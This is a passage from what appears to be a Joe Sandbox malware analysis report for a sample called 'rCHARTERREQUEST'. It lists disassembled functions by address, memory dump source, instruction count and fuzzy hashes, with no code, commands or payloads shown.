                                                                                                          • Instruction Fuzzy Hash: CCF017B4A00198CFC765DF18C848B9EB7F6FB89208F1044D69519B7794C7789E858F11
                                                                                                          Function 06B861AB Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: S
                                                                                                          • API String ID: 0-543223747
                                                                                                          • Opcode ID: 0bb4b23de7205bc8fde5235823792f6c829b8795ef4c7c787f34a335b03177e2
                                                                                                          • Instruction ID: 88591f1c5cbb01e98db495ff432094d691964758a7136d45c55ab33239433d74
                                                                                                          • Opcode Fuzzy Hash: 0bb4b23de7205bc8fde5235823792f6c829b8795ef4c7c787f34a335b03177e2
                                                                                                          • Instruction Fuzzy Hash: A0E08CB82001099FC344EF59D888E8A37F6F785318F008269E304A7388CB385D84CF92
                                                                                                          Function 06C6256B Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933607000.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c60000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *
                                                                                                          • API String ID: 0-163128923
                                                                                                          • Opcode ID: 0e23c4991cb39b95bbfe983b757a1a810546eacdd8b52711f37c365bd0b8b78b
                                                                                                          • Instruction ID: cbcdc256749e9be7c3e6815f5b6988627913c05843af877ccb58a815d6d7c4cd
                                                                                                          • Opcode Fuzzy Hash: 0e23c4991cb39b95bbfe983b757a1a810546eacdd8b52711f37c365bd0b8b78b
                                                                                                          • Instruction Fuzzy Hash: 0BD01C34900228CFEB22CF20C990A8EB7B6BB04308F0000D8E80C63300DB305F82CF05
                                                                                                          Function 06D45FE8 Relevance: .4, Instructions: 437COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f8b8cd81885e297df8bd7c9f86a4dd01e0435a361b1d94e049af6f796cc4d045
                                                                                                          • Instruction ID: 7992a4267aa569af1bff41cb40c3b21b77bdb4f7e4f097bbea8d808eac3342c6
                                                                                                          • Opcode Fuzzy Hash: f8b8cd81885e297df8bd7c9f86a4dd01e0435a361b1d94e049af6f796cc4d045
                                                                                                          • Instruction Fuzzy Hash: 4912D734A002198FDB54EF64C994AADB7B2FF89300F5185A8E54AAB355DF30ED85CF90
                                                                                                          Function 06B83742 Relevance: .2, Instructions: 247COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8e2a225a411b066594d37078179b02881a5039d8f243c1c98120669af6a73a06
                                                                                                          • Instruction ID: b9e53fd1007b7c1b81225cd0c054991805e536f2169743d69faada17938f677b
                                                                                                          • Opcode Fuzzy Hash: 8e2a225a411b066594d37078179b02881a5039d8f243c1c98120669af6a73a06
                                                                                                          • Instruction Fuzzy Hash: 61A1E2F4D19209CFEB90EFD5D444BAEBBF1AB45704F009199D426A7281C7B89989CF81
                                                                                                          Function 06B8E6B0 Relevance: .2, Instructions: 246COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5b43ac20c3c23c53127793fbde5df9a8d3c8d42b0ac794ad69a25ef5ec8c83f8
                                                                                                          • Instruction ID: 01d20245c3e30551c02c4d3b26d1a65368a6dd664b976f19d151e79ab3aee85e
                                                                                                          • Opcode Fuzzy Hash: 5b43ac20c3c23c53127793fbde5df9a8d3c8d42b0ac794ad69a25ef5ec8c83f8
                                                                                                          • Instruction Fuzzy Hash: 50913775A00218CFC754EF69C48499EBBF6FF88350B1585A9E856AB371DB30ED42CB90
                                                                                                          Function 06D45FD8 Relevance: .2, Instructions: 240COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 223cda839d9bd78c34ce1206f700f56a68f97579f35c559d25e675ab0cd4ccae
                                                                                                          • Instruction ID: ecb45021674597cd449c7656189c8d18496d0a968633b31a10ca328284767009
                                                                                                          • Opcode Fuzzy Hash: 223cda839d9bd78c34ce1206f700f56a68f97579f35c559d25e675ab0cd4ccae
                                                                                                          • Instruction Fuzzy Hash: EBA1FA34A002148FDB54EF24C894BA9BBB6FF89300F5585A8E54AAB395DF70ED85CF50
                                                                                                          Function 06D4EB40 Relevance: .2, Instructions: 236COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3306091be4bc5e1d99aded66dd0bdcca517a7fde4f2b81f686e73274df5427f8
                                                                                                          • Instruction ID: 5f51933ab1f66fcde6ed6c6e68362b97e2487f5afcd7cf0879acaa63c0b53352
                                                                                                          • Opcode Fuzzy Hash: 3306091be4bc5e1d99aded66dd0bdcca517a7fde4f2b81f686e73274df5427f8
                                                                                                          • Instruction Fuzzy Hash: CCA1D774A04218DFDB54EFA9E4847ADBBF2FB89304F108029D51AAB394DB385C85CF51
                                                                                                          Function 06D4EB3E Relevance: .2, Instructions: 233COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec473448b84309ba10d61f2f5ed07a93d432c68e894960c9c1e8f3929cf76d99
                                                                                                          • Instruction ID: a027d0f05b411d75291fa5734c72e53f1e55843156d14425cba2274cd7fc1ada
                                                                                                          • Opcode Fuzzy Hash: ec473448b84309ba10d61f2f5ed07a93d432c68e894960c9c1e8f3929cf76d99
                                                                                                          • Instruction Fuzzy Hash: 34A1D674A00218DFDB54EFA9E484BADBBF2FB89304F108029E519AB394DB385C85CF51
                                                                                                          Function 06B8C6C3 Relevance: .2, Instructions: 232COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e4adbcfdd47d5350845abea195b66a3e95bc5af0fa3e467c208ce07f39c0815e
                                                                                                          • Instruction ID: ccf7218886deea67c594b9f1ed20f0ec5a46918440a57d587e81c13f29eb2e52
                                                                                                          • Opcode Fuzzy Hash: e4adbcfdd47d5350845abea195b66a3e95bc5af0fa3e467c208ce07f39c0815e
                                                                                                          • Instruction Fuzzy Hash: 57A16BB4E006298FCF51DFA6D850AEDBBF1FF48740F148094E851A7285DB389982CFA1
                                                                                                          Function 06D46F90 Relevance: .2, Instructions: 226COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d8a2f4300beeb5b5c4eadb8effc51d3d761106fb842b60b09485f657f11238e4
                                                                                                          • Instruction ID: bc431cb9a5e2dc726236c5608f667bf7901a6d9ddbef86ffbb4bc35fa12700bf
                                                                                                          • Opcode Fuzzy Hash: d8a2f4300beeb5b5c4eadb8effc51d3d761106fb842b60b09485f657f11238e4
                                                                                                          • Instruction Fuzzy Hash: 98813B30B102149FCB94EF68D894A6DBBB6FF89710F1140A9E516DB3A1CB34ED46CB90
                                                                                                          Function 06D4F1E9 Relevance: .2, Instructions: 191COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69d4bee1b3e6fe728815b5d937baa6431d6a1700f49b742791e2f56f30098505
                                                                                                          • Instruction ID: acdfd6ac0eb44182463794bf425bb4c882da91a19f00cd0da65fb982e3d89abc
                                                                                                          • Opcode Fuzzy Hash: 69d4bee1b3e6fe728815b5d937baa6431d6a1700f49b742791e2f56f30098505
                                                                                                          • Instruction Fuzzy Hash: 76710378D05248CFEB64EFA9E484BADBBF2FF89304F109029D409A7265DB785D85CB40
                                                                                                          Function 06D4F1F8 Relevance: .2, Instructions: 184COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49c15e47af79b3cd7f5867b6d8affa7199eef34f4261db95400a7ca66ffd7aa4
                                                                                                          • Instruction ID: d0723dc2ec909889a35939e8e5990dbfc1c2a945211441cc8d273870ce3291df
                                                                                                          • Opcode Fuzzy Hash: 49c15e47af79b3cd7f5867b6d8affa7199eef34f4261db95400a7ca66ffd7aa4
                                                                                                          • Instruction Fuzzy Hash: 6A710474D05248CFEB64DFA9E484BADBBF2FF89304F109029D409A7261DB789D85CB40
                                                                                                          Function 0705D688 Relevance: .2, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 03a7e98c4817ed8e330a055e67d54cbce06b59401e8214408401be373cb4b225
                                                                                                          • Instruction ID: e83a6bfd59157020216aa2fa74ef5ea7ac42c9772946d990a30e1e23950ebcb0
                                                                                                          • Opcode Fuzzy Hash: 03a7e98c4817ed8e330a055e67d54cbce06b59401e8214408401be373cb4b225
                                                                                                          • Instruction Fuzzy Hash: 3371D0B4E11219CFDB44DFA8D984AEEBBF2FB89304F10422AD82AA7354D7345D46CB51
                                                                                                          Function 06D46F80 Relevance: .2, Instructions: 166COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8ee789ad4309c01ce8ba67fb7320c068f08498322be2723db61f1f33f5328792
                                                                                                          • Instruction ID: 695d1a2178cd64cf53a1390bb34d82ffb3358f3f7e9f06cc2ec259007adcc24a
                                                                                                          • Opcode Fuzzy Hash: 8ee789ad4309c01ce8ba67fb7320c068f08498322be2723db61f1f33f5328792
                                                                                                          • Instruction Fuzzy Hash: 02614E34B10214DFCB54EF68D894AADB7B6FF89700F1081A9E5169B3A5CB30EC42CB90
                                                                                                          Function 06D36D80 Relevance: .2, Instructions: 162COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d78108c622a1b50a3b6953aaf556c7f50c01bd794ee718c46e3e558c0a4faae8
                                                                                                          • Instruction ID: f2aee9091534957661493647ee1ad15cb89af0e3cc6eb6a621d59267f5550102
                                                                                                          • Opcode Fuzzy Hash: d78108c622a1b50a3b6953aaf556c7f50c01bd794ee718c46e3e558c0a4faae8
                                                                                                          • Instruction Fuzzy Hash: BF71C2B8E002199FDB54DFAAD49479DBBF2FB89304F108069E919AB384DB385985CF50
                                                                                                          Function 06D3CC95 Relevance: .2, Instructions: 157COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cc2fc6dd9be50ea14d8ec59779ef62d82d20b660d8e50b67adb5de26b910892a
                                                                                                          • Instruction ID: 43ee794936ba3c3d5ffbd49a83e9b4f97ed38ad7f0e129824bf3f2817ed68040
                                                                                                          • Opcode Fuzzy Hash: cc2fc6dd9be50ea14d8ec59779ef62d82d20b660d8e50b67adb5de26b910892a
                                                                                                          • Instruction Fuzzy Hash: 18516A35B012149FDB55DFA5E855BADBBB2EF88301F248069E912E7390CB758D41CB90
                                                                                                          Function 06D36D70 Relevance: .2, Instructions: 151COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: af6001dacd8cc542118f39267635bcbbdf1df600866e19df5845282f26da8df4
                                                                                                          • Instruction ID: a7ada850525804a9ba080cb41b57683cb73cf71510dacc3837c31a40b441ecc3
                                                                                                          • Opcode Fuzzy Hash: af6001dacd8cc542118f39267635bcbbdf1df600866e19df5845282f26da8df4
                                                                                                          • Instruction Fuzzy Hash: 7061C378E002189FDB54DFA9D48479DBBF2FB89304F208169E959AB384DB385981CF51
                                                                                                          Function 06D3CBD8 Relevance: .1, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49e909f9cd51215a4dcb5ede232ceea4f883ed96c1fe251bec7b0d8dc4d0d9a5
                                                                                                          • Instruction ID: 204889e922e1206dbfb6e3a285d504209b45b6860fd97cec243ec3e707eb85be
                                                                                                          • Opcode Fuzzy Hash: 49e909f9cd51215a4dcb5ede232ceea4f883ed96c1fe251bec7b0d8dc4d0d9a5
                                                                                                          • Instruction Fuzzy Hash: 89516935A112248FCB55CFA9E984AADBBF2FF88311F14806AE911E7350CB35DE41CB50
                                                                                                          Function 06D41CD8 Relevance: .1, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5e6e9729838d464e6cbe8599d5ac5eb9ff9eb2cc1fb03421e0908a91e69771e
                                                                                                          • Instruction ID: fe5285daec952b4fb9630777db6f5154bc8b9ce6d1c2374097a9636455122a13
                                                                                                          • Opcode Fuzzy Hash: b5e6e9729838d464e6cbe8599d5ac5eb9ff9eb2cc1fb03421e0908a91e69771e
                                                                                                          • Instruction Fuzzy Hash: DE516F34B006099FCB04EF64E898AAEB7B6FFC8715F108119E5129B3A4DF749D46CB81
                                                                                                          Function 0705FB38 Relevance: .1, Instructions: 142COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1935005830.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7040000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 868c14fbad080dac521f79955a3181e73292a89bfa86760be4770dbe6e35b5b4
                                                                                                          • Instruction ID: 30589a793ef04b4a37029aa306045b3ed435d8f1fa0674664bc7f127ace88c18
                                                                                                          • Opcode Fuzzy Hash: 868c14fbad080dac521f79955a3181e73292a89bfa86760be4770dbe6e35b5b4
                                                                                                          • Instruction Fuzzy Hash: 37510AB4E01209DFDB44EFAAD8946AEBBF2FBC9304F108169E815A7250DB786D45CF50
                                                                                                          Function 06B89348 Relevance: .1, Instructions: 132COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 93cb7579c21eb9b2ad51691b68d3437efa1dc0de40d6db9e1793d3f7888b89cf
                                                                                                          • Instruction ID: 5ae7409935b8b2695383a763481ebd12de710bffe8b7f02f10d264fc03bde43f
                                                                                                          • Opcode Fuzzy Hash: 93cb7579c21eb9b2ad51691b68d3437efa1dc0de40d6db9e1793d3f7888b89cf
                                                                                                          • Instruction Fuzzy Hash: C851E6B4E04218CFDF64EFA9C884AADBBF2FB89304F108169E419A7385C7359945CF50
                                                                                                          Function 06D4A400 Relevance: .1, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1c409986d0099572e5549fd7bac35c5896239bd871517acbac4a307682431ddb
                                                                                                          • Instruction ID: 11ce975fd26e5a2e7a6197d010b91f3bc8542c2edd5d3a02759af6a5893480f8
                                                                                                          • Opcode Fuzzy Hash: 1c409986d0099572e5549fd7bac35c5896239bd871517acbac4a307682431ddb
                                                                                                          • Instruction Fuzzy Hash: DA412930B04305AFC725AF68D804BAEBBB6EF85710F14455EE55ADB790DB70AD05CB90
                                                                                                          Function 06D49E88 Relevance: .1, Instructions: 126COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c564cb1f515486a406ef955cf3507910f4592d9de9f0318fa217bde5004092e9
                                                                                                          • Instruction ID: 640a97d4076f6ffe726cea1d8617a4ff72e52201dd628fc292a61b7d1aa0139f
                                                                                                          • Opcode Fuzzy Hash: c564cb1f515486a406ef955cf3507910f4592d9de9f0318fa217bde5004092e9
                                                                                                          • Instruction Fuzzy Hash: 6741C131F057548FCBA1EB79D55029BBBF1EF84610B04896EE09ACBB44DA30ED01CB81
                                                                                                          Function 06D4A2B8 Relevance: .1, Instructions: 124COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a44f125b5617bc444e13b1cd30ac96a9acd251cb24e8a3ce7bacb2fb7974a5f6
                                                                                                          • Instruction ID: 8189c600429b2eb66c3e46bf02db926d054e238799a9cd8b2fefd58a2f616949
                                                                                                          • Opcode Fuzzy Hash: a44f125b5617bc444e13b1cd30ac96a9acd251cb24e8a3ce7bacb2fb7974a5f6
                                                                                                          • Instruction Fuzzy Hash: 10419B75A007049FCB61DFA9C848A6EBBF2FF88300F188959E58297A55E731F904CF61
                                                                                                          Function 06B82F37 Relevance: .1, Instructions: 123COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: eccda73a53f151d5332281eadba79c2239c182ae365897fe7dd94760e00f55b2
                                                                                                          • Instruction ID: 44a81344ca744ec211b5ba2a954b162db04564e94214014238c3efb66da6f9a3
                                                                                                          • Opcode Fuzzy Hash: eccda73a53f151d5332281eadba79c2239c182ae365897fe7dd94760e00f55b2
                                                                                                          • Instruction Fuzzy Hash: F351E0B4905209CFEB84EF98D484BEEBBF1FB59304F105099E50AA7291C7785A85CFD0
                                                                                                          Function 06D3D2F8 Relevance: .1, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 60388a7398383b8de36838b3e00215c80c9c6c0e64c59678890e105e10d856ec
                                                                                                          • Instruction ID: f482bd64b532628d9d5409053f33e3c8039ba91a06e7565eb68636c0ce07eafa
                                                                                                          • Opcode Fuzzy Hash: 60388a7398383b8de36838b3e00215c80c9c6c0e64c59678890e105e10d856ec
                                                                                                          • Instruction Fuzzy Hash: AC415834A00315DFDB549BA9D884B6AB7F2EF88300F148429E916AB394DB75E845CF90
                                                                                                          Function 06B82F2C Relevance: .1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 97a7a7fd6b4709806759125d73f791e5ae0e7c1197e9bff6733cdfaed6228079
                                                                                                          • Instruction ID: 9aa233e98c80680e16a5737e236fc98ab0ad56a560631e4e9b6f998fa1de6d0d
                                                                                                          • Opcode Fuzzy Hash: 97a7a7fd6b4709806759125d73f791e5ae0e7c1197e9bff6733cdfaed6228079
                                                                                                          • Instruction Fuzzy Hash: D741D0B4905209DFEB84EF98D484BEEBBF1FB59304F205099E509A7280C3785A85CFD0
                                                                                                          Function 06D4F2D0 Relevance: .1, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 24c8ca94071dd6c8e1f0f605001e45ab5d7534915add8eb57bc6d2cf7d3e2991
                                                                                                          • Instruction ID: bc486592300a48f618dd53b34ca494a5c4a1c2c420655048afc50ab718e4c45a
                                                                                                          • Opcode Fuzzy Hash: 24c8ca94071dd6c8e1f0f605001e45ab5d7534915add8eb57bc6d2cf7d3e2991
                                                                                                          • Instruction Fuzzy Hash: B841C378D05248CFEB60DF99D484BADBBF2FF89305F245029D409A7265DB789D85CB00
                                                                                                          Function 06B82878 Relevance: .1, Instructions: 107COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 12aa36801279f231891e8575d28981b7e275b54df79d24028613bf30811ea1e6
                                                                                                          • Instruction ID: 5acd20810fae689454b1027a2bff163850a6ba4663464f434c50af8f57b3dab8
                                                                                                          • Opcode Fuzzy Hash: 12aa36801279f231891e8575d28981b7e275b54df79d24028613bf30811ea1e6
                                                                                                          • Instruction Fuzzy Hash: E641E4B4E022199FEB84DF99D544BEEBBF2FB88304F109069E515B7380D7785A44CBA1
